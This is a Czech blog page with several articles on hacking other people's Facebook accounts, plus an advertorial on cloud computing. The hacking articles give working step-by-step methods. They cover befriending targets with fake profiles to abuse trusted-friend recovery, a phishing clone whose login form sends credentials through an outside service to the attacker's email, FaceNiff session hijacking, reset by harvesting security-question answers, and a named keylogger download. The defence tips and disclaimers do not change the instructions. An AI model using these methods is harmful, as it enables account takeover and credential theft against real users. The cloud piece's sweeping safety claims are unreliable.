Hack s pomocí přátel

Bře 01
2013

                Po delší době jsem narazil na nový postup, jak se nabourat do FB účtů. Momentálně ho testuji skrze své fake účty přímo na svém profilu a jak se zdá, je jenom otázkou času, kdy se mi vlastní účet podaří hacknout. Tento způsob je tak trochu běh na dlouhou trať, bude-li však mít hacker trpělivost, v cestě proniknout do požadovaného FB účtu mu bude bránit už jenom opatrnost vlastníka profilu. Celé je to totiž (nečekaně) opět založené na naivitě uživatelů. A přitom stačí dodržovat jediné pravidlo a této potencionální hrozbě se můžete zcela vyhnout!

  • Jak to celé funguje? 

Facebook umožňuje obnovit heslo pomocí tří vašich přátel. V případě ztráty hesla, máte možnost vygenerovat si nové heslo. Heslo se rozdělí na tři části a každá z částí se odešle jednomu z vašich přátel. Dosud nevidíte cestičku, jak získat potřebné heslo? Celé kouzlo věci spočívá v tom, že si uvedené tři přátele máte možnost vybrat sami! Pořád vám nic nedošlo? Dobře… pojďme se na to podívat z bližší perspektivy.

  • Znáte skutečně všechny Vaše přátelé?

Celé kouzlo spočívá v tom, že v dnešní době si téměř každý, přidává každého do přátel. Teď je správný čas si přiznat, znáte skutečně všechny “rádoby” přátelé, co mají přístup k vašemu full profilu? Viděli jste všechny přátele někdy osobně? Ne!? Špatně, jste možná v ohrožení. Nejspíš si v duchu říkáte, že nejste takový, že by jste si přidávali neznámý lidi. Ve skutečnosti takové výjimky “přidavači přátel” existují a není jich málo! Co když, však uvedená osoba, žádající o přátelství, bude mít mezi přáteli vaše skutečné přátelé, které skutečně osobně znáte? Opět  nezaváháte? To už je těžší co? Dobře, co udělá většina z nás? Napíše neznámému zprávu ve smyslu “My se známe?” a čeká na odpověď. Asi by jste udělali to samé co?

  • Čas kreativity přichází

Nyní přichází čas na trochu kreativity nebo spíše lží. S uvedený člověkem, máte společné přátelé, co teď? Stačí nyní lehce zapátrat po jejich profilech a zjistit např. jak se uvedená osoba “kterou si chceme přidat” zná s člověkem “kterého už jsme lapili” a pak vymyslet jednoduchý příběh např. potkali jsme se společně s tímhle, na téhle akci a doložit akci, kterou skutečně oba navštívili. Příběhů které si můžete vymyslet je mraky, záleží jen na fantazii a hledání.

  • A to je ta slabina!

Žádající Vám poskytl skutečný důkaz, opravdu toho člověka znáte, opravdu jste tam tehdy na té akci byl. Co když jsem byl natolik opilí a nepamatuji si, že jsme spolu skutečně mluvili. Začnou se nám honit  v hlavě myšlenky a nakonec zvědavost zvítězí a my chceme vědět podrobnější informace o daném žadateli. Klikneme na tížené tlačítko přidat do přátel. Sláva! Uživatel je právě chycen do pasti “pokud si následovně po prohlédnutí,náš účet z přátel opět neodebere” .

  • K čemu tohle všechno? Co teď? Nechápu smysl!

Výše jsem uvedl složitější příklad, mnoho lidí si Vás přidá, aniž by jste měli cokoliv společného. Další si Vás přidají, jen z důvodu, že jste již předtím získal společné přátelé. Ty nejpečlivější se Vás zeptají odkud se znáte. Odpovíte-li nějak rozumně, máte je taky. Jen menší část, si Vás nepřidá ani po tomto kroku.

A k čemu to celé bylo? Na začátku článku jsem,  psal že si můžete nechat zaslat heslo pomocí třech přátel. A co jste právě získali? Přístup jednoho fake profilu k osobě, které se chcete dostat do účtu.  Nyní stačí celý postup opakovat ještě jednou s dalším fake profilem. Pokud si Vás přidá i po druhé, máte již téměř vyhráno.

Právě jste získali tři společné přátelé, které všechny můžete ovládat. Svůj skutečný účet a dva fake profily. Naštěstí ještě pro postihnutého, není dobojováno. Nyní je třeba, být lehce aktivní na fake profilech.. tzn. lajkovat postihnutému fotky , psát komentáře, psát privátní zprávy, atd. zkrátka se u něho na profilu lehce zabydlet. Po delší době, se zobrazí zmíněné dva fake profily a váš skutečný v seznamu důvěryhodných přátel, kam lze zaslat heslo.

  • Jak se mám bránit?

Nejúčinnější obrana je naprosto jednoduchá, přemýšlejte než potvrdíte někomu přátelství! Potvrzujte přátelství jen lidem, které skutečně znáte! I když Vám zmíněná osoba píše, že se znáte odtud a odtud, nevěřte! Pokud jen lehce zapochybujete, odložte přátelství např. do té doby, než zmíněnou osobu potkáte v reálném světě. Eventuálně napiště kamarádovi, kterému skutečně věříte a zeptejte se ho, o koho jde… pokud si též nebude jistý, jedná se o jasný fake profil. Nepřidávat! Nepřidávat! A nevěřit každé historce!

Zpět na hlavní článek >> Jak hacknout facebook ?

Pokračovat na >> Keylogger , Kontrolní otázkaFaceNiff, Phishing, Hack s pomocí přátel

_________________________________________________________________________________

Tento článek není návodem k páchání trestné činnosti, pouze jsem na něm ukázal, jak zranitelné jsou každodenní webové služby bez použití SSL a jak málo stačí při Vaší nepozornosti k tomu, aby jste vyzradili Vaše přístupové údaje někomu cizímu.

Co je „Cloud computing“ ?

Úno 05
2013

           Cloudové služby nejsou tak nové, jak se mnohým může zdát. Jen si vzpomeňte, jak často sdílíte fotky s přáteli, nebo zasíláte dokumenty prostřednictvím internetu. Ale až v poslední době se do povědomí veřejnosti začal dostávat odborný termín „cloud computing“. Je to především z toho důvodu, že firmy začínají hledat cestu, jak nejlépe ušetřit firemní výdaje v IT sféře. Bylo zkrátka třeba nějakým způsobem pojmenovat ten balíček služeb, který je nám víceméně tolik známý. Samozřejmě cloud cumputing není pouze sdílení fotek a dokumentů s přáteli, ale jde o komplexní řešení firemní IT infrastruktury. Ale vezměme to nyní pěkně popořádku a od začátku. Pokusím se vám v tomto článku shrnout základní výhody/ nevýhody (pokud nějaké jsou) a objasnit, co ten cloud cumputing v sobě vlastně skrývá.

Co znamená „Cloud computing“ ?

Určitě jste výše uvedené slovní spojení již někdy ve svém okolí zaslechli, ale stále bloumáte a nejste si jisti, o čem je vlastně řeč. V tom by vám mělo pomoc následujících pár řádků. Po přečtení by vám mělo být hned jasné, jestli je to ideální řešení pro vás či nikoliv.

Takže na začátek si jednoduše definujeme, co vlastně znamená anglické slovní spojení Cloud computing. Cloud je oblak a computing je výpočetní, jinými slovy výpočetní oblak. Proč se to nazývá výpočetní oblak? Charakteristika je jednoduchá. Veškeré služby jsou poskytovány online nebo-li skrz internet, tzn. veškeré výpočetní výkony se provádějí v oblaku = internetu. Často se též setkáváme s označením cloud computingu jako s datovým úložištěm.

Jak to celé funguje?

Princip je založený na úplně jednoduché strategii. Jak se říká: „v množství je síla“. Poskytovatel vámi požadovaných služeb se plně zaměřuje na poskytování určitého druhu služby (např. poskytování e-mailu), kterou vám může poskytnout výhodněji, než kdybyste si službu zajistili sami. Celé poskytování oné služby probíhá skrz internet, tzn. nejedná se o nic fyzického, co byste měli u sebe v kanceláři nebo na fyzickém nosiči. Ke všem službám přistupujete skrze internet.

„Získejte konkurenční výhodu na globálním trhu.“

Důvody, proč je výhodné přenést infrastrukturu IT do oblak.

Z předešlého textu jsou patrné dvě výhody. Samozřejmě těch výhod je mnohem více, ale pro začátek si rozeberme tyto dvě hlavní výhody.

První velká výhoda je cena. Jak to bývá většinou u fyzického zboží? S počtem prodaných výrobků většinou klesá výrobní cena výrobku. Obdobně to funguje i zde. Poskytovatel vyvine nákladný software (službu), kterou následovně zprostředkuje svým klientům online. Čím více prodejů uskuteční, tím více si může dovolit jít s cenou dolů. Pokud byste si tu samou službu nechali vyvinout přímo pro sebe, je třeba počítat s velkými náklady na její vývoj. Tak velkými, že se vám to zkrátka nemusí vyplatit! Je lepší věnovat ušetřený čas svému businessu a nezdržovat se něčím, co již existuje a je pro vás levnější variantou.

„Firemní data v oblacích mohou šetřit Vaše peníze“

Druhá velká výhoda je bezesporu online řešení. Znamená to pro vás, že máte možnost se připojit k pro vás poskytované službě téměř odkudkoliv a z čehokoliv (notebooku, tabletu, mobilu), pokud máte internetovou přípojku a zařízení umožňující přístup na internet. Již nejste omezeni firemní infrastrukturou. Klidně můžete letět na druhý konec světa a pracovat, jako byste byli v kanceláři. Stačí jen znát přihlašovací údaje k zprostředkované službě.

„Zvyšte pracovní flexibilitu zaměstnanců, můžou se připojit prakticky odkudkoliv.“

Dosud nejste přesvědčeni, že je výhodnější si pronajmout hotový systém, než vyvinout, či zakoupit?

Zkusím vás trochu uvést do obrazu, jak je to ve skutečnosti s náklady. Pro mnohé z nás mohou být některé položky nákladů na začátku procesu celkem dobře skryté. Avšak v momentě jejich postupné fakturace jsme velmi často nemile překvapeni, za co všechno je třeba ještě dodatečně doplácet. V podstatě je to obdobné, jako když si koupíte dům. Taky je sice váš, ale musíte o něj neustále dbát, nebo vám brzy spadne střecha na hlavu. Troufám si dokonce tvrdit, že občas jsou náklady spojené s údržbou domu vyšší, než by byl pouze nájem s plným full-servisem. K tomu samozřejmě nesmíme zapomenout na velké pořizovací výdaje na onen dům. Bohužel však většina z nás toto nevidí, nebo ani nechce vidět a tiše doufá, že pořizovací výdaje jsou taky jejich poslední vydané výdaje. A tohle je právě ta největší a zásadní chyba! Opak je pravdou. Teprve až nyní přichází čas platit.

Nejspíš nyní přemýšlíte, jaké další výdaje tím mám na mysli. Je to vcelku jednoduché a prosté. Pomineme-li nákladný vývoj samotné služby, budete potřebovat taky hardware (servery, kabeláž, atd.), na kterém vaše služba poběží. Dále nesmíme opomenout pravidelné náklady spojené především se samotným provozem vámi vyvinuté služby. Například platby za spotřebovaný elektrický proud pro hardware a údržbu samotného hardwaru. Nesmíte opomenout platit i za odborného pracovníka, který se vám o uvedenou službu (i hardware) bude starat. Nezapomeňte, že i čas je neúprosný. Bude nutné, aby docházelo k aktualizacím služby. Chcete-li, aby služba zůstala na vlně nejnovějších trendů a vy tak mohli uspět na trhu. I zde, bude třeba vynaložit značný finanční obnos.

Bohužel, není tomu ani jinak, pokud si zakoupíte software (poskytující službu) na nosiči, nebo si ho stáhnete skrz internet. Ani tehdy nemusíte zůstat ušetřeni dodatečným nákladům. Vydavatel softwaru se bude snažit zlepšovat svůj software tak, abyste byli neustále nuceni platit za nové a nové aktualizace či eventuálně obnovovat licence k použití (licence vztahující se k počtu počítačů, licence omezující se na časový úsek atd.). Některý software bude vyžadovat z výše zmiňovaných nákladů i odbornou péči IT odborníka.

Cena cloudového řešení? Všechny výše uvedené náklady jsou již většinou zahrnuté v platbě za vámi požadovanou službu v cloudu. Není třeba platit dokonce ani za další vývoj. Váš systém je stále aktuální. Nebojte se. Váš poskytovatel se bude opravdu snažit. Nechce přece přijít o klienta, který mu zajišťuje pravidelnou platbu. Zvlášť když i v oblasti cloud computingu existuje konkurence a je čím dál tím zřetelnější.

Čeho se nejvíce obávají zájemci v oblasti cloud computing?

Nejvíce obav panuje především v oblasti zabezpečení dat. Přestože je větší pravděpodobnost, že ke zneužití vašich dat dojde spíše na lokálně provozované službě u vás ve firmě než v samotném cloudu. Datová centra, na kterých cloudové služby v dnešní době běží, mají veškeré možné bezpečnostní certifikace na správě dat. Samozřejmostí je, že jsou vaše data zálohovaná na x-dalších záložních serverech a nejlépe i po celém civilizovaném světě. Takže tyto obavy jsou zcela neopodstatněné, a proto se není čeho obávat. Abych tu pouze nepěl ódu na cloud cumputing, je třeba zmínit, že zabezpečení není nikdy na 100%. Ale v tomto případě si můžete být jisti, že je na 99,99%. Vždy se může najít profesionální hacker, který se vás bude snažit poškodit, ale riziko, že si vybere právě vás a právě vaše data napadne na takhle dobře chráněných serverech, je vážně minimální. Dalo by se označit za zanedbatelné. Závěrem bych rád k bezpečnosti dodal, že nakonec bude vždy záležet na koncových uživatelích. Jaké heslo a zabezpečení si sami zvolí k přístupu ke svému účtu. Sebedokonalejší systém je v ohrožení, napíše-li si uživatel na lepící papírek k monitoru heslo ke svému účtu.

A další „nevýhody“?

Nejsou to tak ani tak nevýhody jako spíš nezvyk v naší společnosti. Zkusím uvést jeden příklad pro lepší pochopení věci. Když jdete koupit do obchodu CD svého oblíbeného hudebního interpreta, jste rádi, když odcházíte z obchodu a držíte v ruce obal od CD, nějakou grafiku obsaženou na potiscích, samotné CD a v neposlední řadě samotnou hudbu na nosiči. Máte zkrátka v ruce nějaký hmatatelný důkaz, že jste vyložili právě dvě až tři stovky za CD. Přitom to nejdůležitější, pro co jste šli, je ona hudba. Ta hudba, kterou si můžete taky stáhnout z internetu o 30-40% levněji. Zkrátka co autor článku chce vyjádřit: „Člověk má raději něco hmatatelného, než někde něco v oblacích imaginárního.“ A stejně tak tomu je u cloudových služeb. Platíte zkrátka za něco, na co si nemůžete doopravdy sáhnout a přece to funguje. Jen již vám v kanceláři nehučí servery, všude se neválejí krabičky od nainstalovaného softwaru a kolem nepobíhá zběsilý „ajťák“ se zkroucenou dvojlinkou kolem krku. Z toho se odvíjí další nevýhoda, dáli se to opět tak nazvat. Nemáte zkrátka data pod svojí fyzickou kontrolou, ale visí např. někde na serveru v severní Americe a jste tím svým způsobem závislý na svém cloud providerovi. Avšak proč z toho mít obavy? Vaše data jsou přece v bezpečí, možná větším, než kdyby byla fyzicky u vás. Zároveň vždy existuje možnost si potřebná data stáhnout a provést zálohu na lokální nosiče pro váš vnitřní klid. A že jste závislý? Ano, stejně tak jako jste závislý na svém mobilním operátorovi, teplé vodě a světle. A to nepíšu o tom, že u mobilního operátora je mnohem větší pravděpodobnost, že dojde k výpadku služby, než u cloudového řešení. Neboť se svět doposud nesetkal s krachem nebo větším výpadkem cloudových služeb.

„Nehledejte důvody proč ne, raději myslete na budoucnost.“

Ať už se teď rozhodnete jakkoliv, dříve nebo později cloudových služeb budete využívat. Neboť není správné si klást otázku „Jestli tomu tak bude?“, ale položit si otázku, „Kdy tomu tak bude?“. Tím, že tento krok uskutečníte dříve než většina ostatních, máte větší šanci uspět v budoucnosti oproti zaostávající konkurenci. Věděli jste například, že téměř 50% českých firem zaostává se svojí IT infrastrukturou za Evropou? Ne?! Nebuďte mezi nimi. Dle odborných odhadů se plánuje přesun většiny firemní IT infrastruktury do cloudu během následujících 2 až 3 let. Je tedy nejvyšší čas získat náskok a porozhlédnout se po svém cloudovým providerovi.

Shrnutí na závěr

  • Cloud služby jsou globální, tzn. vyžaduje-li podnik komunikaci např. v Asii, Austrálii nebo jinde na světě, služba bude na daném místě stále stejná, stačí přístup k internetu a patřičné zařízení.
  • Cloud přináší dlouhodobé ekonomické benefity a především flexibilitu služeb.
  • Cloud spoří náklady a přináší nové funkce, které stávající řešení nemusí nenabízet.
  • Cloud je bezpečnější, než kdejaká jiná veřejně poskytovaná služba.

„Cloud computing je budoucnost, první vlak s pasažéry odjíždí již nyní.“

Google Apps pro firmy (Google Apps for Business) – jeden z nejrozšířenějších cloudových balíčků na světě – firemní e-mail, kalendář, chat, documents managment, správa meeting rooms, intranet, projektové portály, Google Docs a mnoho dalšího, více informací naleznete na webové stránce www.sievert.cz .

Google Apps

Již brzy nový článek, týkající se jednotlivých cloudových služeb.

Jak hacknout facebook ?

Bře 18
2012

Jak hacknout facebook? Dobře, přiznávám název článku zní trošku nadnešeně. Určitě neočekávejte od tohoto článků, že Vám krok po kroku poradí, jak vypnout jednu z největších sociálních sítí na světě s téměř 750 miliony uživatelů. Pokud jste přesně tohle chtěli zjistit, máte nejspíš smůlu a je nejvyšší čas opustit od čtení. Opravdovým cílem tohoto článku je ukázat, jak je celkem  jednoduché s trochou snahy,  dostat se někomu do účtu , případně zjistit jeho přihlašovací údaje na profil.Druhým dechem bych rád dodal, že článek by měl především sloužit jako varování. A především tak ponaučit uživatele, na co by si měli dát pozor. Případně jakým nejčastějším situacím při používání Facebooku je nejlépe se vyvarovat. V opačném případě Vám dost hrozí, že dáváte svoje údaje v risk.

Existuje celá řádka způsobu, jak docílit získání přihlašovacích údajů na konkrétního uživatele. V dnešním článku se Vám pokusím představit celkem čtyři zcela odlišné způsoby.  Vždy uvedu způsob a zároveň obranu, tak aby jste se sami nestali možnými poškozenými.  Níže uvedené způsoby, je zakázané praktikovat v reálném prostředí, pokud se nechcete dostat do křížku ze zákonem.

Co říct na závěr? Taky Vám ztuhl úsměv na tváři, jak vlastně jednoduché to celé je? S troškou šikovnosti a odhodlanosti někoho,  je Váš účet celkem v nebezpečí. Doporučuji tedy řádně pročíst ještě jednou odstavce – ” Jak se mám bránit? ” u jednotlivých způsobu a snažit se jimi co nejvíce řídit. Nedávejte své přihlašovací údaje zadarmo na potkání, pokuste se to alespoň co nejvíce dotyčnému zkomplikovat ;). Pokud jste se setkali s dalšími způsoby? Neváhejte napsat do komentářů níže, článek rád o Vaše tipy doplním.
_________________________________________________________________________________
Tento článek není návodem k páchání trestné činnosti, pouze jsem na něm ukázal, jak zranitelné jsou každodenní webové služby bez použití SSL a jak málo stačí při Vaší nepozornosti k tomu, aby jste vyzradili Vaše přístupové údaje někomu cizímu.

Phishing

Bře 18
2012

Další cizí slovo, který nejspíš většině z Vás nic neřekne. Phishing vychází z anglické slova fishing což  znamená rybaření, myšleno v kontextu jako “návnada” a počáteční písmeno f je nahrazeno ph, což má trošku hlubší význam, pokud Vás to zajímá mrkněte na wikipedia.cz. Abych to uzavřel, přeložil bych Phishing trošku nadnešeně jako – “návnady pro lamy” 🙂 . Ajťáci pochopí, laická veřejnost asi bude dumat proč, jsem použil slovo lamy. Ale to by bylo na další vysvětlování.

Co to tedy přesně dělá a jak mi to pomůže hacknou někomu účet? Phishing je podvodná technika používaná na Internetu k získávání citlivých údajů,  nejčastěji se jedná o zadání osobních údajů na falešnou stránku, která na první pohled není k rozeznání od skutečné stránky. V podstatě uživatel, takto věnuje své citlivá data aniž by měl ponětí, že právě naletěl podvodníkům.

Takže náš úkol bude vytvořit totožnou kopii Facebook úvodní příhlašovací stránky, kterou tak všichni dobře známe. Následovně zařídit, aby jsme obdrželi takto získané údaje na svůj email. První krok, přejděte na stránka facebook.com, klikněte pravým tlačítkem myši kamkoliv na stránku, z menu vyberte Zobrazit zdrojkový kód stránky ( Google Chrome ) , Zobrazit zdrojový kód ( IE 9 ) , Zobrazit zdrojový kód stránky ( Firefox ) . Použijte kombinaci kláves CTRL + A označit vše, CTRL + C kopírovat.  Otevřete si nyní např. notepad nebo word a vložte CTRL + V . Nyní jděte na stránku soom.cz , proveďte registraci na stránkách  a následovně z pravého menu vyberte GET2MAIL a klikněte na možnost Registrovat nové id . Vygeneruje se Vám ID, které zhruba bude vypadat nějak následovně 02184f4679 . Klikněte na něj a zaškrtněte možnost – Zasílat data e-mailem (vas@email.cz)  Nyní se vraťte zpět ke zdrojovému kódu stránky a v kódu najděte spojení:

<form id=”POST” action=” https://www.facebook.com/login.php?login_attempt=1″ method=”post” onsubmit=”return Event.__inlineSubmit(this,event)”>

a nahraďte

<form id=”POST” action=” http://www.soom.cz/projects/get2mail/redir.php?id= 02184f4679&url=https://www.facebook.com/login.php?login_attempt=1″ method=”post” onsubmit=”return Event.__inlineSubmit(this,event)”>

za červený text dosaďte Vaše ID, které jste si vygenerovali na stránkách soom.cz. Nyní celý text opět označte CTRL + A a kopírujte CTRL + C . Otevřete si stránku pastehtml.com , nakopírujte změněný zdrojový kód Facebooku. Klikněte na modré tlačítko Publish page a opět vpravo nahoře na Publish page. Objeví se Vám stránka s linkem, tento link si zkopírujte a vložte do prohlížeče. Tadááá výsledek je na světě, mrkněte jak by zhruba měl vypadat >> SEM  << . Nyní stačí jen, když Vám někdo na této stránce vyplní přihlášení na svůj profil a Vám tak automaticky přijdou tyto informace na email.

  • Je to skutečně tak vážný?

Ano, jedná se o celkem vážný případ, kdy méně znalý uživatel může naletět na takto podvodně vytvořené stránky. Neboť i když se stránka nachází na jiné doméně, mnozí nepozorní uživatelé si toho nevšimnou a to nemluvím, že není větší problém, stránku nechat otevírat ve framu aniž by byla adresa stránky vůbec vidět ! Mimo to,  uživatel zadá svoje přihlašovací údaje a následovně mu naskočí pravá facebook stránka!  Uživatel se  tak domnívá, že pouze špatně vyplnil heslo, neboť ho facebook vyžaduje znova ! Ve skutečnosti, však právě jeho heslo odešlo někomu do mejl boxu a on se poprvé skutečně hlásí do svého FB profilu.

  • Jak se mám bránit?

Jediným řešením je neklikat na různé tlačítka líbí se mi, neklikat na odkazy odkazující na facebook z jiných stránek. Vždy se přihlašujte na svůj Facebook profil pouze přes doménu www.facebook.com ! Jakmile zpozorujete cokoliv jiného, rychle ze stránek vycouvejte! Kontrolujte adresu stránky ve Vašem prohlížeči, případně když najedete myší na jakýkoliv odkaz, většinou se v prohlížeči vlevo dole, při najetí na odkaz zobrazí skutečná adresa stránky, na kterou budete odkázáni.

Zpět na hlavní článek >> Jak hacknout facebook ?

Pokračovat na >> Keylogger , Kontrolní otázkaFaceNiff, Phishing, Hack s pomocí přátel

_________________________________________________________________________________

Tento článek není návodem k páchání trestné činnosti, pouze jsem na něm ukázal, jak zranitelné jsou každodenní webové služby bez použití SSL a jak málo stačí při Vaší nepozornosti k tomu, aby jste vyzradili Vaše přístupové údaje někomu cizímu.

FaceNiff

Bře 18
2012

Předpokládám, že většině z Vás pojem FaceNiff slyší poprvé. Jedná se o prográmek, který je určený pro mobilní telefony s operačním systémem Android. A co tento prográmek dělá? Jednoduše analyzuje komunikaci v síti a hledá ty datové pakety, které tečou na servery Facebooku.  Hmm zajímavé, ale co já s tím? Díky tomuto prográmku, můžete získat unikátní session ID právě platného pro Facebook účet, který vyvíjí aktivitu ve Vašem okolí v rámci Wi-fi sítě. Dobře, zkusím vysvětlit ještě jednou, trochu více polopatě 🙂 .

Představte si, sedíte venku na zahrádce, číšník Vám přinese pivo,venku je krásně…všimnete si, že kousek od Vás sedí krásný/á  kluk/holka a cosi datluje do svého notebooku. A Vás by tak strašně zajímalo se o něm dozvědět něco více, ale jste příliš stydlivý, aby jste se zvedli a  šli se ho zeptat přímo. Samozřejmě, že je na zahrádce k dipozici připojení k internetu přes Wi-fi síť . Není těžké odhadnou, že zmíněný človíček je třeba právě na svém Facebooku. Jako téměř každý mladý, připojený k internetu. Co teď? Máte v kapse mobil s Androidem a nainstalovanou aplikací FaceNiff. Stačí zapnou aplikaci, která již sama nalezne aktivní účty ve Vašem okolí. Pokud budete mít trošku štěstí, podaří se Vám připojit na jeho/její profil a vyčíst tak všechny potřebné údaje.

  • Je to opravdu tak jednoduchý?

Naštěstí to tak jednoduchý není, tzn. neočekávejte, že každý s operačním systémem Android ve Vašem okolí Vám může hacknout Váš profil 😉 . Neboť k tomu aby aplikace FaceNiff na Vašem telefonu fungovala, musíte provést další změny přímo v telefonu. Především se pak dostat do rootu Vašeho mobilu tzn. vytvoření jakéhosi superuživatele, který má přístup ke všem součástem softwaru telefonu. Je to obdoba správce systému, jak ho znáte z desktopových Windows ( v případě zájmu, více informací v článku – ”  Co to je root telefonu a k čemu je to dobré ” ) . Každý telefon má svůj vlastní způsob, jak výše zmíněného docílit, doporučuji Vám vyhledat přesný návod. Jen bych Vás rád upozornil, že veškerá rizika, včetně možného poškození systému či “bricknutí” telefonu jdou výhradně na Vaši zodpovědnost.

  • Jak se mám bránit?

Obrana proti programu FaceNiff je velmi jednoduchá, stačí donutit Facebook komunikovat za pomocí SSL šifrování. Přejděte na Nastavení účtu z menu na levé straně zvolte Zabezpečení a u první možnosti Zabezpečené procházení klikněte na Upravit a zatrhněte políčko možnost – Kdykoli je to možné, používat Facebook prostřednictvím zabezpečeného připojení (HTTPS) . A jste v bezpečí i když budete brouzdat na netu přes Wifinu a pít pivo 😉 .

Zpět na hlavní článek >> Jak hacknout facebook ?

Pokračovat na >> KeyloggerKontrolní otázka, FaceNiff, PhishingHack s pomocí přátel

_________________________________________________________________________________

Tento článek není návodem k páchání trestné činnosti, pouze jsem na něm ukázal, jak zranitelné jsou každodenní webové služby bez použití SSL a jak málo stačí při Vaší nepozornosti k tomu, aby jste vyzradili Vaše přístupové údaje někomu cizímu.

Kontrolní otázka

Bře 18
2012

Není to ani tak hacknutí jako spíš využití lidské blbosti uživatelů. Neboť přístup přes kontrolní otázku, je někdy až příliš jednoduchý. Jak je to možný? Zkrátka 99% uživatelů používá na kontrolní otázky správné odpovědi, tzn. odpovědi které lze nějakým způsobem získat.

Klikněte na Zapomněli jste své heslo?  pod polem heslo,  Zadejte své jméno a jméno přítele. Tzn. člověka kterému se chcete dostat do účtu + jednoho jeho kamaráda, snadno zjistíte z návštěvy jeho profilu, neboť málo kdo používá funkci skrýt své přátelé. Následovně na Vás vyskočí tabulka s dotazem “Chcete obnovit své heslo?” , kde vidíte počáteční písmena registračního emailu či telefonu. Klikněte na na možnost – Nemáte již přístup k těmto údajům? . Jděte na stránku 10 Minute Mail nechte si vygenerovat automaticky e-mail, který Vám poslouží na 10 minut. Nechceme přeci uvádět svůj pravý email. Takto vygenerovaný email použijte jako náhradní email do polí” Jak vás můžeme zastihnout? “. Pokud uživatel použil a vyplnil bezpečnostní otázku, Facebook  ji po Vás nyní bude požadovat. A teď přichází Vaše chvíle. Neboť Facebook, má nastaveno defaultně pouze 6 otázek. Při troše snaze, není větší problém na uvedené otázky zjistit odpovědi ! Stačí zapojit Google vyhledávač, pořádně projet uživateli profil či zajít na spolužáky. Případně cílit přímo na uživatele dobře zvolené komenty či vzkazy, kterým z něj zmíněné odpovědi vytáhnete a on nebude mít přitom nejmenší tušení, že Vám věnoval lístky do první řady na jeho profil.  A to nemluvím, že město narození Vaší matky je zpravidla získatelné ze státem poskytovaných zdrojů !

Jak se jmenovalo tvoje první zvířátko ?

– najdete na fotkách na profilu, případně zjistíte  konverzací s dotyčným

Jaké bylo příjmení tvojí učitelky na základní škole?

– konverzace s dotyčným případně s bývalím spolužákem, jehož jméno zjistíte na profilu třídy na serveru spoluzaci.cz , eventuálně třídní stránky, stránky školy, atd..

V jakém městě se narodila Vaše matka?

– odhadnout dle místa současného bydliště, kde jsou porodnice a tak…

Vašich posledních 5 znaků z řidičského průkazu?

– toto většinou nikdo nepoužívá a zjistit by to bylo dost složité, při konverzaci těžko naleznete téma na znaky na řidičáku, tzn. jediný řešení dotyčného vzít do hospody, pokecat… a pak si začít ukazovat fotky na jednotlivých dokladech, zapamatovat si číslo a napsat rychle do mobilu 😉

V jaké ulici jsi žil, když Ti bylo 8 let ?

– v našich končinách není ve zvyku se během života x-krát stěhovat jako jinde ve světe, tzn.  nám to dost ulehčuje práci. Většinou tedy současné bydliště odpovídá bydlišti v osmi letech ( cca. berme to jako nepsané pravidlo u uživatelů do 25 let ) . Eventuálně zjistit, kde žijí jeho rodiče. Zjistíte při konverzaci s dotyčným, kde dříve bydlel, můžete si nechat ukázat třeba na mapě přesný dům či byt 😉 .

Jaké je jméno první holky nebo prvního kluka, kterého jsi políbil?

– fotky na profilu nebo konverzace na toto téma.

Tímto jsem se Vám snažil krátce nastínit pár možností, jak tyto informace získat od Vámi požadovaného uživatele. Samozřejmě představivosti se meze nekladou a určitě existují i další způsoby, jak tyto informace lze získat či vylákat z potencionálních cílů. Nyní však zpět k procesu, jakmile správně odpovíte na jeho/její otázku, obdržíte email na Vámi založený účet. Otevřete si email, klikněte na link v emailu, budete přesměrováni zpět na Facebook , kde budete vyzváni k vytvoření nového hesla. Nyní je třeba počkat 24 hodin, než se budete moci pod novým heslem a Vámi zvoleným e-mailem (nezapomeňte si poznamenat vygenerovanou email adresu) přihlásit do Vámi nabouraného účtu. Je vhodné celé to udělat v momentě, kdy dotyčná osoba je mimo dosah připojení, aby v průběhu 24 hodin nemohl být celý průběh narušen.

  •  Jak se mám bránit ?

Nejlepší způsob jak se bránit je vyplňovat bezpečnostní otázky nepravdivě. Tzn. na otázku kde jsem žil v 8 letech napsat ulici, třeba Vaší školy. Nebo na otázku koho jsme políbil jako poprvé, napsat třeba jméno sourozence. Zkrátka tak, aby jste jako jediný znali správnou odpověď . Neboť i když někdo zjistí skutečnou odpověď, bude mu k ničemu, neboť vy používáte nepravdivou odpověď. A tu nikde nemá šanci zjistit, když není podle čeho 😉 .

Zpět na hlavní článek >> Jak hacknout facebook ?

Pokračovat na >> Keylogger, Kontrolní otázka, FaceNiffPhishingHack s pomocí přátel

_________________________________________________________________________________

Tento článek není návodem k páchání trestné činnosti, pouze jsem na něm ukázal, jak zranitelné jsou každodenní webové služby bez použití SSL a jak málo stačí při Vaší nepozornosti k tomu, aby jste vyzradili Vaše přístupové údaje někomu cizímu.

Keylogger

Bře 18
2012

Říká Vám něco slovo Keylloger ? Z anglického slova “Key – klávesa” & “Logger – záznam” nebo-li v češtině zaznamenávač kláves.  Pokud ne, jedná se o software nainstalovaný na počítači, jehož cílem je snímat otisky jednotlivých kláves. Sám software o sobě nepoškozuje nikterak Váš počítač, avšak zaznamenává veškerou Vaší aktivitu na něm.  Kterou následovně, může přeposílat komukoliv na e-mail případně ukládat formou reportu na nějaký vzdálený počítač. Osoba disponující těmito údaji, má možnost vyčtením ze záznamu získat Vaše heslo jak na FB tak kamkoliv jinam!  Na první pohled, že tento software pracuje na Vašem počítači nepoznáte, veškerý běh i jeho soubory jsou skryté, což je vcelku logické, když se má chovat tajně. Propracovanost těchto programů je v dnešní době tak velká, že dokáží i v určeném časovém rozmezí snímat aktivitu na obrazovce tzn. dělat prinscreeny. Případně mohou zaznamenávat zvukovou aktivitu či ukládat historii o navštívených webových stránek! Je toho opravdu hodně co svedou, určitě by vydalo psaní na toto téma na samostatný článek ( další info v případě zájmu na wiki ). Nejpoužívanější Keylogger nese označení All In One Keylogger a shareware verzi na 7 dní si můžete zdarma stáhnout na stránkách slunecnice.cz .

  • Jak se mám bránit?

